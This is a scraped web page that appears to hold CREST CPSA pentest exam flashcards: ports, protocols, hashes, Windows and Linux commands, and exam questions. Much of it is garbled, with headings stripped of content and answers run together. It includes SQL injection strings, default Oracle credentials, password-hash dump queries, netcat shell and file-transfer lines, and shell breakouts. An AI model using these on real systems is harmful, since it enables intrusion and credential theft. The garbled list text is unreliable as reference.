Crest cpsa exam practice test
crest cpsa exam cost
crest cpsa exam questions and answers
crest cpsa exam dump
Crest cpsa exam questions
crest cpsa pass mark
crest cpsa course
crest cpsa exam github<\/p>\n\n\n\n
TCP
Transmission Control Protocol<\/p>\n\n\n\n
UDP
User Datagram Protocol<\/p>\n\n\n\n
Port 21
FTP<\/p>\n\n\n\n
FTP
File Transfer Protocol<\/p>\n\n\n\n
Port 22
SSH<\/p>\n\n\n\n
SSH
Secure Shell<\/p>\n\n\n\n
Port 23
Telnet<\/p>\n\n\n\n
Port 25
SMTP<\/p>\n\n\n\n
SMTP
Simple Mail Transfer Protocol<\/p>\n\n\n\n
Port 49
TACACS<\/p>\n\n\n\n
TACACS
Terminal Access Controller Access Control System<\/p>\n\n\n\n
Port 53
DNS<\/p>\n\n\n\n
DNS
Domain Name System<\/p>\n\n\n\n
Port 67 (UDP)
DHCP (Server)<\/p>\n\n\n\n
Port 68 (UDP)
DHCP (Client)<\/p>\n\n\n\n
DHCP
Dynamic Host Configuration Protocol<\/p>\n\n\n\n
Port 69 (UDP)
TFTP<\/p>\n\n\n\n
TFTP
Trivial File Transfer Protocol<\/p>\n\n\n\n
Port 80
HTTP<\/p>\n\n\n\n
HTTP
Hypertext Transfer Protocol<\/p>\n\n\n\n
Port 88
Kerberos<\/p>\n\n\n\n
Kerberos
A computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner<\/p>\n\n\n\n
Port 110
POP3<\/p>\n\n\n\n
POP3
Post Office Protocol version 3<\/p>\n\n\n\n
Port 111
RPC<\/p>\n\n\n\n
RPC
Remote Procedure Call<\/p>\n\n\n\n
Port 123
NTP<\/p>\n\n\n\n
NTP
Network Time Protocol<\/p>\n\n\n\n
Port 135
Windows RPC (EPM)<\/p>\n\n\n\n
Port 593
RPC over HTTPS<\/p>\n\n\n\n
Port 445
SMB<\/p>\n\n\n\n
SMB
Server Message Block<\/p>\n\n\n\n
Port 137 (UDP)
NetBIOS (name services)<\/p>\n\n\n\n
Port 138 (UDP)
NetBIOS (datagram services)<\/p>\n\n\n\n
Port 139
NetBIOS (session services)<\/p>\n\n\n\n
NetBIOS
Network Basic Input\/Output System<\/p>\n\n\n\n
Port 143
IMAP<\/p>\n\n\n\n
IMAP
Internet Message Access Protocol<\/p>\n\n\n\n
Port 161 (UDP)
SNMP<\/p>\n\n\n\n
SNMP
Simple Network Management Protocol<\/p>\n\n\n\n
Port 179
BGP<\/p>\n\n\n\n
BGP
Border Gateway Protocol<\/p>\n\n\n\n
Border Gateway Protocol (BGP)
A standardized exterior gateway protocol designed to exchange routing and reach-ability information among autonomous systems on the Internet. The protocol is classified as a path vector protocol.<\/p>\n\n\n\n
Port 201
AppleTalk<\/p>\n\n\n\n
Port 389
LDAP<\/p>\n\n\n\n
LDAP
Lightweight Directory Access Protocol<\/p>\n\n\n\n
Port 443
HTTPS<\/p>\n\n\n\n
Port 500 (UDP)
Internet Key Exchange (IKE) (used with IPSec)<\/p>\n\n\n\n
ISAKMP<\/p>\n\n\n\n
ISAKMP
Internet Security Association and Key Management Protocol<\/p>\n\n\n\n
Port 514 (UDP)
Syslog<\/p>\n\n\n\n
Port 520
RIP<\/p>\n\n\n\n
RIP
Routing Information Protocol<\/p>\n\n\n\n
Port 546
DHCPv6 (client)<\/p>\n\n\n\n
Port 567
DHCPv6 (servers)<\/p>\n\n\n\n
Port 587
SMTP<\/p>\n\n\n\n
Port 902
VMWare<\/p>\n\n\n\n
Port 1080
Socks Proxy<\/p>\n\n\n\n
Port 636
LDAPS<\/p>\n\n\n\n
Port 1194
VPN<\/p>\n\n\n\n
Port 1433
MS-SQL<\/p>\n\n\n\n
Port 1434
MS-SQL (monitoring)<\/p>\n\n\n\n
Port 1521
Oracle<\/p>\n\n\n\n
Port 1629
DameWare<\/p>\n\n\n\n
Port 2049
NFS<\/p>\n\n\n\n
NFS
Network File System<\/p>\n\n\n\n
Port 3128
Squid Proxy<\/p>\n\n\n\n
Port 3306
MySQL<\/p>\n\n\n\n
Port 3389
RDP (Remote Desktop Protocol)<\/p>\n\n\n\n
Port 5060
SIP<\/p>\n\n\n\n
SIP
Session Initiation Protocol<\/p>\n\n\n\n
Port 5222
Jabber<\/p>\n\n\n\n
Port 5432
Postgres<\/p>\n\n\n\n
Port 5666
Nagios<\/p>\n\n\n\n
Postgres
An object-relational database management system with an emphasis on extensibility and standards compliance<\/p>\n\n\n\n
Nagios
Open source system monitoring service<\/p>\n\n\n\n
Port 5900
VNC<\/p>\n\n\n\n
VNC
Virtual Network Computing<\/p>\n\n\n\n
Port 6000
X11<\/p>\n\n\n\n
X11
A windowing system for bitmap displays, common on Unix-like operating systems. Provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.<\/p>\n\n\n\n
Port 6129
DameWare<\/p>\n\n\n\n
DameWare
Remote Access Software on port 6129<\/p>\n\n\n\n
Port 6667
IRC (Internet Relay Chat)<\/p>\n\n\n\n
Port 9001
Tor<\/p>\n\n\n\n
Port 9001
HSQL<\/p>\n\n\n\n
Port 9090
Openfire<\/p>\n\n\n\n
Port 9100
Jet Direct<\/p>\n\n\n\n
Yersinia
Layer 2 testing tool (STP, CDP, VLAN Trunking, etc)<\/p>\n\n\n\n
STP
Spanning Tree Protocol<\/p>\n\n\n\n
CDP
Cisco Discovery Protocol<\/p>\n\n\n\n
DTP
Dynamic Trunking Protocol<\/p>\n\n\n\n
HSRP
Hot Standby Router Protocol<\/p>\n\n\n\n
VTP
VLAN Trunking Protocol<\/p>\n\n\n\n
fgdump
A utility for dumping passwords on Windows NT\/2000\/XP\/2003 machines<\/p>\n\n\n\n
Reserved Internal IPs
10.0.0.0\/8 (10.0.0.0-10.255.255.255) : Private<\/p>\n\n\n\n
127.0.0.0\/8 (127.0.0.0-127.255.255.255) : Local Host Loopback<\/p>\n\n\n\n
172.16.0.0\/12 (172.16.0.0-172.31.255.255) : Private<\/p>\n\n\n\n
192.168.0.0\/16 (192.168.0.0-192.168.255.255) : Private<\/p>\n\n\n\n
Symmetric Encryption
DES\/3DES
AES
Twofish
Blowfish
Serpent
IDEA
RC4, RC5, RC6
CAST<\/p>\n\n\n\n
Asymmetric Encryption
RSA
El Gamal
ECC Eliptic Curve
Diffie-Helman (Key Exchange)
Paillier
Merkle-Helman
Cramer-Shoup<\/p>\n\n\n\n
Hashes
MD5
SHA1
MySQL < 4.1
MySQL5
MD5 (WP)
MD5 (phpBB3)
LM \/ NTLM<\/p>\n\n\n\n
Oracle Default Credentials
–Username | Password–
SYSTEM | MANAGER
ANONYMOUS | ANONYMOUS
SCOTT | TIGER
OLAPSYS | MANAGER
SYS | CHANGE_ON_INSTALL<\/p>\n\n\n\n
Port 512
rexec (username \/ password)<\/p>\n\n\n\n
Port 513
rlogin (telnet)<\/p>\n\n\n\n
Port 514
rsh<\/p>\n\n\n\n
Port 514
rcp<\/p>\n\n\n\n
LM Hash
Primary Windows LAN hash before Windows NT. 14 character limit.<\/p>\n\n\n\n
DES
56 bit key encryption (16 cycles of 48 bit subkeys)<\/p>\n\n\n\n
3DES
168 bit key encryption (48 cycles)<\/p>\n\n\n\n
TTL for Windows
128<\/p>\n\n\n\n
TTL for Linux
64<\/p>\n\n\n\n
TTL for Networking Devices \/ Solaris
255<\/p>\n\n\n\n
Cisco Password Encryption
secret 4 : Crappy SHA256
secret 5 : Salted MD5
secret 7: Crappy Cisco encryption to prevent cleartext in the config
secret 8 : PBKDF2 (Password-Based Key Derivation Function 2) bruteforce target
secret 9 : scrypt (BINGO)<\/p>\n\n\n\n
SIP Requests
INVITE
ACK
BYE
CANCEL
OPTIONS
REGISTER
PRACK
SUBSCRIBE
NOTIFY
PUBLISH
INFO
REFER
MESSAGE
UPDATE<\/p>\n\n\n\n
SMTP Requests
MAIL
RCPT
DATA<\/p>\n\n\n\n
SNMP Requests
Get
GetNext
Set
GetBulk
Response
Trap
Inform<\/p>\n\n\n\n
HTTP Status Codes
1xx – Info
2xx – Success
3xx – Redirection
4xx – Error
5xx – Server Error<\/p>\n\n\n\n
HTTP Status Code 404
NOT FOUND the method is not available<\/p>\n\n\n\n
HTTP Status Code 301
Moved Permanently<\/p>\n\n\n\n
HTTP Status Code 302
Temporarily Moved<\/p>\n\n\n\n
HTTP Status Code 410
Gone<\/p>\n\n\n\n
SQL Injections (Escape Characters)
‘ OR ‘1’ = ‘1’ —
‘ OR ‘1’ = ‘1’ {
‘ OR ‘1’ = ‘1’ \/*<\/p>\n\n\n\n
SQL Injections (Type Handling)
1;DROPTABLE users<\/p>\n\n\n\n
Linux File Permissions
drwxrwxrwx 2 user(owner) group size date filename<\/p>\n\n\n\n
d | rwx | rwx | rwx
Filetype | User | Group | Everyone<\/p>\n\n\n\n
Linux Command : Change Password
passwd<\/p>\n\n\n\n
Linux Command : Find Files of Type Linux File System Structure IPTables Wireshark and TCPdump pfSense Solaris Command : Process Listing Solaris Command : Services and Status Solaris Command: Start Service (Admin) NT 3.1 Versions NT 3.5 Versions NT 3.51 Versions NT 4.0 Versions NT 5.0 Versions NT 5.1 Versions NT 5.2 Versions NT 6.0 Versions NT 6.1 Versions NT 6.2 Versions %SYSTEMDRIVE%\\boot.ini %SYSTEMROOT%\\repair\\SAM<\/p>\n\n\n\n %SYSTEMROOT%\\System32\\config\\RegBack\\SAM Windows Commands : System Info Windows Command : Find Files of Type Windows Commands : Add User, Make Admin Linux Command : Add User, Make Sudoer Command : View Network Info Command : Display File Contents nslookup IIS 1 Defaults IIS 2 Defaults IIS 3 Defaults IIS 4 Defaults IIS 5 Defaults IIS 5.1 Defaults IIS 6 Defaults IIS 7 Defaults IIS 7.5 Defaults IIS 8 Defaults IIS 8.5 Defaults IIS 10 v 1607 Defaults IIS 10 v 1709 Defaults IIS 10 v 1809 Defaults Windows Command : Disable Firewall Sysinternals Suite WMCI WMCI Command : Execute Process WMCI Command : Uninstall Software PCI Card Info Storage Common-Use<\/p>\n\n\n\n Windows : Active Directory Default Location Ntds.dit is the physical storage file<\/p>\n\n\n\n Windows : Domain Common Folders Contains Group Policies, Login Scripts, Staging Folders, etc.<\/p>\n\n\n\n dsquery Classful IP Range : Class A Range : 0.0.0.0-127.0.0.0 Classful IP Range : Class B Range : 128.0.0.0-191.255.0.0 Classful IP Range : Class C Range : 192.0.0.0-223.255.255.0 Classful IP Range Calculation If the second bit is a “0”, it’s a class B address (Half of the remaining non-class-A addresses, or one quarter of the total.)<\/p>\n\n\n\n If the third bit is a “0”, it’s a class C address (Half again of what’s left, or one eighth of the total.)<\/p>\n\n\n\n If the fourth bit is a “0”, it’s a class D address. (Half the remainder, or one sixteenth of the address space.) If it’s a “1”, it’s a class E address. (The other half, one sixteenth.)<\/p>\n\n\n\n Classless Subnets \/ CIDR CRITICAL SUBNET INFO Hexadecimal Chart VLAN VLAN IDs 1002-1005 VLAN IDs greater than 1005 VLAN IDs 1-1005 vlan.dat Netcat : Start Listener to Catch Shell (-e is execute and is not always supported)<\/p>\n\n\n\n Netcat : Listen Netcat : Transfer Text or Binary Files Sender: nc -nv IP to send to 4444 < file<\/p>\n\n\n\n Netcat : Bind Shell Sender\/ “Talker”: (this will execute the cmd.exe and all the “Talker” to connect to the host) Netcat : Reverse Shell Sender: (sends shell!) NMap : Scan Types Port Count This applies to TCP AND UDP<\/p>\n\n\n\n NMap : Scan EVERY Port NMap : Common Options NMap : DNS Reverse Lookup Hash Lengths IIS Apache \/ Tomcat GWS Websphere Litespeed MS-SQL : DB Version EXEC xp_msver MS-SQL : Run OS Command MS-SQL : SELECT commands SELECT DB_NAME ( ) : Current DB<\/p>\n\n\n\n SELECT name FROM master..sysdatabases; : List DBs<\/p>\n\n\n\n SELECT user_name ( ) : Current user<\/p>\n\n\n\n SELECT name FROM master..syslogins : List users<\/p>\n\n\n\n SELECT name FROM master..sysobjects WHERE xtype=’U’; : List Tables<\/p>\n\n\n\n SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjections WHERE name=’mytable’); : List columns<\/p>\n\n\n\n MS-SQL : List all Tables and Columns MS-SQL : System Table (Info on All Tables) MS-SQL 2005 Vulnerability (Password Hashes) Postgres : SELECT commands SELECT inet_server)addr(); : Hostname and IP<\/p>\n\n\n\n SELECT current_database(); : Current DB<\/p>\n\n\n\n SELECT datname FROM pg_database; : List DBs<\/p>\n\n\n\n SELECT user; : Current user<\/p>\n\n\n\n SELECT username FROM pg_user; : List Users<\/p>\n\n\n\n SELECT username,passwd FROM pg_shadow : List password hashes<\/p>\n\n\n\n MySQL Default Credentials MySQL : SELECT Commands SELECT @@hostname; : Hostname and IP<\/p>\n\n\n\n SELECT database(); : Current DB<\/p>\n\n\n\n SELECT distinct (db) FROM mysql.db; : List DBs<\/p>\n\n\n\n SELECT user(); : Current user<\/p>\n\n\n\n SELECT user FROM mysql.user; : List Users<\/p>\n\n\n\n SELECT host,user,password FROM mysql.user; : List password hashes<\/p>\n\n\n\n MySQL : List Tables (and Columns) SELECT * FROM information_schema.columns (full dump)<\/p>\n\n\n\n Oracle : SELECT Commands SELECT instance_name FROM v$instance : Current DB SELECT DISTINCT owner FROM all_tables; : List DBs<\/p>\n\n\n\n SELECT user FROM dual; : Current User<\/p>\n\n\n\n SELECT username FROM all_users ORDER BY username; : List users<\/p>\n\n\n\n SELECT column_name FROM all_tab_columns; : List Columns<\/p>\n\n\n\n SELECT table_name FROM all_tables; : List Tables<\/p>\n\n\n\n SELECT name, password, astatus FROM sys.user$; : List password hashes<\/p>\n\n\n\n host.equiv (or .rhosts file) Structure +<\/p>\n\n\n\n Allow any user from host with a matching local account to log in:<\/p>\n\n\n\n host<\/p>\n\n\n\n Allow any user from host to log in:<\/p>\n\n\n\n host +<\/p>\n\n\n\n Allow user from host to log in as any non-root user:<\/p>\n\n\n\n host user<\/p>\n\n\n\n Allow all users with matching local accounts from host to log in except for baduser:<\/p>\n\n\n\n host -baduser Deny all users from host:<\/p>\n\n\n\n -host<\/p>\n\n\n\n Allow all users with matching local accounts on all hosts in a netgroup:<\/p>\n\n\n\n +@netgroup<\/p>\n\n\n\n Disallow all users on all hosts in a netgroup:<\/p>\n\n\n\n -@netgroup<\/p>\n\n\n\n Allow all users in a netgroup to log in from host as any non-root user:<\/p>\n\n\n\n host +@netgroup<\/p>\n\n\n\n Allow all users with matching local accounts on all hosts in a netgroup except baduser:<\/p>\n\n\n\n +@netgroup -baduser Linux Shell Breakouts echo os.system(‘\/bin\/bash’)<\/p>\n\n\n\n \/bin\/sh -i<\/p>\n\n\n\n Language Vulns : Java (OO) Language Vulns : C (Function) Language Vulns : Objective-C (OO) Language Vulns : C++ (OO) Language Vulns: PHP NIC Network Interface Card (NIC) MAC NAT Media Access Control (MAC) Network Address Translation (NAT) OSI Model 1 : Physical (Bits) TCP\/IP Model 1 : Network Interface IETF IANA Wireless Standards Data Link Protocols ARP IGMP FQDN IOC POC Proof of Concept<\/p>\n\n\n\n SIEM MBSA CAT5 Ethernet Token Ring APIPA MTU Unicast Multicast Router Protocol Link State Routing Distance Vector Routing Hybrid Routing IGP Interior Gateway Protocol (IGP) EGP Exterior Gateway Protocol (EGP) IPv6 No broadcast, has Anycast instead. MAC Address Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers.<\/p>\n\n\n\n Network Architectures 10BaseT 100BaseT 1000BaseT Wireless Network 802.11<\/p>\n\n\n\n Shared Media LAN Switched Media LAN *Hubs are similar, but with NODES<\/p>\n\n\n\n Netcraft WHOIS Egress filtering Ingress Filtering DNS Record Types Start of Authority (SOA) Record Mail Exchanger (MX) Record A \/ AAAA Record Name Server (NS) Record Pointer Record (PTR) CNAME (Canonical name record) Network Protocols Cisco Discovery Protocol (CDP) HSRP (Hot Standby Router Protocol) VRRP (Virtual Router Redundancy Protocol) VTP (VLAN Trunking Protocol) STP (Spanning Tree Protocol) WEP Wired Equivalent Privacy (WEP) WPA Wireless Protected Access (WPA) WPA2 uses AES Encryption<\/p>\n\n\n\n EAP (Extensible Authentication Protocol) EAP LEAP PEAP nbtstat Global Catalog Server Master Browser FSMO Flexible Single Master Operations (FSMO) Roles LANMAN hash NTLM NTLM Hash NTLMv2 OSPF (Open Shortest Path First) Static Routing Dynamic Routing Port 1 Port 5 Port 7 Port 18 Port 29 Port 37 Port 42 Port 43 Port 70 Port 79 Port 103 Port 118 Port 119 Newsgroup<\/p>\n\n\n\n Port 159 Port 190 Port 197 Port 396 Port 444 Port 458 Port 500 Computer Misuse Act 1990 Human Rights Act 1998 Data Protection Act 1998 GDPR (General Data Protection Regulation) DoS DDoS (Distributed Denial of Service) XSS (Cross Site Scripting) MySQL < 5.1 Authentication Bypass 1\/256 chance of being triggered, so one can just keep sending login attempts over and over to access.<\/p>\n\n\n\n *Can only be exploited if built on a system where the memcmp() function can return values outside the -128 to 127 range<\/p>\n\n\n\n Passive OS fingerprinting Common Tools: Network Miner, p0f, Satori, Wireshark<\/p>\n\n\n\n Active OS Fingerprinting NMap is awesome at this<\/p>\n\n\n\n AES (Advanced Encryption Standard) TKIP (Temporal Key Integrity Protocol) SMTP User Enumeration Sendmail < 8.12.9 Buffer Overflow X11 Can be intercepted if not tunneled through SSH<\/p>\n\n\n\n RPC (Remote Procedure Call) Enumeration Query RPC portmapper using rpcinfo: rpcinfo p<\/p>\n\n\n\n Non-Persistent XSS Can be used to steal cookies, redirect to phishing sites, and force actions if targets click on crafted links<\/p>\n\n\n\n Persistent XSS Good for getting ahold of forms, tickets, submissions, etc<\/p>\n\n\n\n SOAP Simple Object Access Protocol (SOAP) XML injection XXE (XML External Entity) Attack Web Server Common Flaws HTTP Web Methods GET LDAP Injection Base64 Encoding OSSTMM ISECOM OWASP PTES CPNI Police and Justice Act 2006 Computer Fraud and Abuse Act of 1986 HIPAA FISMA GLBA Gramm-Leach-Bliley Act of 1999 GDPR FERPA PCI DSS Basel Accord ISO 27000 Series COBIT IPv4 Cat 5 TTL CSMA\/CA CDMA The ATM PDU is the cell 1.3.6.1.2.1.25.1.6.0 TCP Port 1 TCP Port 7 TCP Port 11 TCP 13 TCP 15 TCP 19 TCP 21 TCP 22 TCP 23 TCP 25 TCP 37 TCP 42 TCP 43 TCP 49 TCP 53 TCP 70 TCP 79 TCP 80 TCP 88 TCP 110 TCP 113 TCP 119 TCP 139 TCP 143 TCP 179 TCP 389 TCP 443 TCP 445 TCP 512 TCP 513 TCP 514 TCP 1080 TCP 1433 TCP 1521 TCP 1723 TCP 2433 TCP 3128 TCP 3268 TCP 3306 TCP 3389 TCP 5432 TCP 5900 TCP 6000 TCP 9100 UDP 53 UDP 67 and 68 UDP 69 UDP 123 UDP 135 UDP 137 and 138 UDP 161 UDP 445 UDP 500 UDP 513 UDP 520 UDP 1434 UDP 2049 TKIP XML LSASS LSA RSA CRLF OSPF NFS RIP IKE AES SQL ISAPI ASP NTP WSUS SSH WSDL CNAME TTL CGI STP In a DNS zone transfer, what is a requested? Telnet remote machine returns :<\/p>\n\n\n\n User Access Verification Which o\/s? DES DES. Key size? HTTP OSI Model layer? HTTP Code. Temporarily moved? SQL server resolution service introduced? SQL server stored procedures. ICMP type 8 response to host without firewall SYS user password (oracle) how can HTTP Trace method used against web server? Java technique that minimises threat from applets enumerate users with empty GECOS field. LANMAN and NTLM. Stored procedure xp_cmdshell can? Unmap unused ISAPI filters to\u2026? Which SQL string can be used in username to bypass an authentication mechanism. Different Web site host names have same IP. How does web server differentiate? HTTP Method for enumerating HTTP methods. EXPN command protocol? DNS Zone transfer command. SMTP commands to enumerate users on a default Sendmail server. CVE-2003-0780 MySQL version has post authentication privilege escalation issue. DES Data block size RC4 Key size Symmetric encryption algorithm. Salted md5? Trusted hosts and usernames for unix r-services Cookie attribute for must stored on disk Null session to windows. Reason for written permission for pen test. CVE-2002-0906 buffer overflow, sendmail version. Which ruser command lists active user details. Password hashes stored on linux HTTP Methods SAM file location IIS 5.0. Which o\/s? IPv6 bits? How are cookies presented back to the server? SOAP HTTP method for soap api data transfer? Windows permissions<\/p>\n\n\n\n Windows tracert packets? Which command enumerates exchange server connected by Telnet. SSH version susceptible to man in the middle attacks. TTL = 128. Which o\/s? Public Key Encryption ICMP destination host unreachable (number?) Windows command to list all patches TNS listener default config. LDAP command injection characters. RSA Self signed SSL. Certificate vulnerability Cookie can be accessed by client side scripts. Which cookie attribute? CVE-2001-0414 NTP remote exploit version? AD database filename IPv4 bits? Prevent user enumeration through null sessions. Which registry? IKE Main mode more secure than aggressive. Because? DNS Zone Reverse look up record. For ip 192.168.1.10 BIND version information. Command? xhost – NOT a SIP method. FTP command to initiate data transfer MAC address size. 802.3 DBSNMP default password? CVE 2012-5615 MySQL 5.6.0 vulnerability.? NOT an ICMP message PHP version chunk_split()function overflow<\/p>\n\n\n\n HTTP status code bad request? TFTP command to list directory. ARP VTP CDP TACACS 100 101 102 Internet Protocol Security (IPsec) Internet Protocol Security (IPsec) number of possible TCP ports number of possible UDP ports RFC1918 24-bit block RFC1918 20-bit block RFC1918 16-bit block Common Vulnerabilities and Exposures (CVE) Common Vulnerability Scoring System (CVSS) DREAD Common Weakness Enumeration (CWE) National Vulnerability Database (NVD) 500 501 502 503 504 505 511 CHANGE_ON_INSTALL MANAGER TIGER WOOD STEEL CLOTH PAPER TRACE MANAGER CHANGE_ON_INSTALL 400 401 402 403 404 405 406 407 408 409 410 411 413 426 429 threat risk inherent risk residual risk Session Initiation Protocol (SIP) SIP requests IPsec security architecture LM LM LM LM LM LM 128 bits Net-NTLM Net-NTLM Net-NTLMv1 Net-NTLMv2 128 bits NTLM NTLM 128 bits NTLM Net-NTLM nbtstat; nbtscan nbtstat nbtscan PEAP LEAP LEAP stream cipher (symmetric) symmetric-key block cipher symmetric-key block cipher symmetric-key block cipher Media Access Control (MAC) address 48 bits Oracle System ID (SID) rlogin; rcp; rsh permissions required for copying a file into \/ out of a directory blind SQL injection Link-Local Multicast Name Resolution (LLMNR) Network Basic Input\/Output System (NetBIOS) name service LLMNR spoofing FTP bounce attack Ntds.dit file computer worm Internet Information Services (IIS) 5.0 Code Red computer worm Conficker computer worm Distributed Component Object Model (DCOM) Blaster computer worm Local Security Authority Subsystem Service (LSASS) Internet Explorer Aurora KiTrap0D Print Spooler Service OK Created Accepted Non-Authoritative Information No Content Reset Content 300 301 302 307 308 0 3 4 5 8 9 10 11 30 42 43 Address Resolution Protocol (ARP) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) Virtual Router Redundancy Protocol (VRRP) VLAN Trunking Protocol (VTP) Spanning Tree Protocol (STP) Terminal Access Controller Access-Control System Plus (TACACS+) Voice over Internet Protocol (VoIP) Session Initiation Protocol (SIP) IEEE 802.11 Kismet Wired Equivalent Privacy (WEP) Temporal Key Integrity Protocol (TKIP) Wi-Fi Protected Access \/ Wi-Fi Protected Access II (WPA\/WPA2) Extensible Authentication Protocol (EAP) Lightweight Extensible Authentication Protocol (LEAP) Protected Extensible Authentication Protocol (PEAP) Teletype Network (Telnet) Teletype Network (Telnet) Hypertext Transfer Protocol (HTTP) Hypertext Transfer Protocol (HTTP) Hypertext Transfer Protocol Secure (HTTPS) File Transfer Protocol (FTP) File Transfer Protocol (FTP) Secure Shell (SSH) Simple Network Management Protocol (SNMP) using SNMP to attack a network SNMP authentication SNMP autodiscovery Trivial File Transfer Protocol (TFTP) Trivial File Transfer Protocol (TFTP) Cisco Reverse Telnet Network Time Protocol (NTP) NTP message spoofing Network Time Protocol (NTP) SNMP, RMON [Cisco5506], Netflow [Cisco06] [Active06], [Curtis00] .pcap files network socket netstat, ss C:\\windows\\system32\\config\\SAM \/etc\/shadow domain information, registrant contact, administrative contact, technical contact DNS zone transfer zone Start Of [a zone of] Authority (SOA) Mail eXchange (MX) Text (TXT) Address (A) Name Server (NS) Pointer (PTR) HINFO Canonical Name (CNAME) Usenet newsgroup -rwxr-xr-x 0740 archive, hidden, system, read-only filesystem Access Control List (ACL) encryption encoding symmetric encryption asymmetric encryption symmetric-key block cipher 64 bits 56 bits symmetric-key block cipher 64 bits 168, 112, or 56 bits symmetric-key block cipher 128 bits 128, 192, or 256 bits public-key cryptosystem 1024 – 4096 bits Secure Hash Algorithm 1 (SHA1) 512 bits Message-Digest algorithm (MD5) 512 bits message integrity codes Hash-based Message Authentication Code (HMAC) firewall firewall network access control list router switch Secure Sockets Layer (SSL) Internet Protocol Security (IPsec) Secure Shell (SSH) Secure Shell (SSH) Pretty Good Privacy (PGP) Pretty Good Privacy (PGP) Wired Equivalent Privacy (WEP) Temporal Key Integrity Protocol (TKIP) Wi-Fi Protected Access (WPA) egress filtering egress filtering ingress filtering banner grabbing examples of ports used for banner grabbing active fingerprinting Nmap passive fingerprinting application layer presentation layer session layer transport layer network layer data link layer physical layer port scanner Nmap -sS -sT -sU -sO -p -T0 through -T5 –max-rtt-timeout –max-retries –scan-delay -v -vv -oA -6 network sniffer ping ping -s -c -w -t -i -R ping sweep fping Internet Protocol version 4 (IPv4) Internet Protocol version 6 (IPv6) Transmission Control Protocol (TCP) User Datagram Protocol (UDP) Internet Control Message Protocol (ICMP) 8 bits 8 bits Category 5 cable (CAT 5) Category 5 cable (CAT 5) fibre-optic communication 10\/100\/1000baseT Token Ring Token Ring wireless (802.11) shared media switched media Virtual LAN (VLANs) Computer Misuse Act Domain Name System Electronic Code Book Flexible Single Master Operations Hypertext Markup Language Hypertext Transfer Protocol Inter Asterisk eXchange Internet Server Application Programming Interface Network File System Protected Extensible Authentication Protocol Public Key Infrastructure Remote Authentication Dial In User Service Rivest Shamir Adleman Supervisory Control And Data Acquisition Session Initiation Protocol Start Of Authority Simple Object Access Protocol Structured Query Language Secure Shell Spanning Tree Protocol Temporal Key Integrity Protocol Universal Description Discovery and Integration User Datagram Protocol Wired Equivalent Privacy Wi-fi Protected Access Web Services Description Language application pen testing infrastructure pen testing black box white box Computer Misuse Act 1990 Computer Misuse Act 1990 Computer Misuse Act 1990 Human Rights Act 1998 Data Protection Act 1998 Police and Justice Act 2006 Police and Justice Act 2006 Police and Justice Act 2006 Police and Justice Act 2006 risk of pen testing risk of pen testing TCP 548 TCP 179 UDP 67 UDP 68 TCP&UDP 19 TCP&UDP 13 TCP&UDP 135 TCP&UDP 546 TCP&UDP 547 TCP&UDP 9 TCP&UDP 53 TCP&UDP 7 TCP 79 TCP 21 TCP 20 TCP&UDP 989 TCP&UDP 990 TCP 70 TCP 80 TCP 443 TCP 113 TCP 143 TCP&UDP 631 TCP&UDP 194 TCP 6665-6669 UDP 500 TCP 860 TCP 389 TCP 636 TCP 515 UDP 138 TCP 139 TCP&UDP 137 TCP 119 TCP&UDP 563 UDP 123 TCP 110 TCP&UDP 995 TCP&UDP 17 TCP&UDP 554 UDP 520 TCP 513 UDP 513 TCP&UDP 445 TCP 445 TCP 25 TCP 465 TCP 22 TCP&UDP 111 TCP 514 TCP&UDP 49 TCP 23 UDP 69 TCP 43 TCP 1521 TCP&UDP 1433 TCP&UDP 1434 TCP&UDP 177 TCP 3306 TCP&UDP 33434 TCP 3128 TCP&UDP 1194 TCP&UDP 1524 TCP 50000 TCP 5432 TCP 512 Structured Query Language Wired Equivalent Privacy Data Encryption Standard Trivial File Transfer Protocol Local Security Authority Security Accounts Manager Pretty Good Privacy Crest cpsa exam practice testcrest cpsa exam costcrest cpsa exam questions and answerscrest cpsa exam dumpCrest cpsa exam questionscrest cpsa pass markcrest cpsa coursecrest cpsa exam github TCPTransmission Control Protocol UDPUser Datagram Protocol Port 21FTP FTPFile Transfer Protocol Port 22SSH SSHSecure Shell Port 23Telnet Port 25SMTP SMTPSimple Mail Transfer Protocol Port 49TACACS TACACSTerminal Access Controller […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center 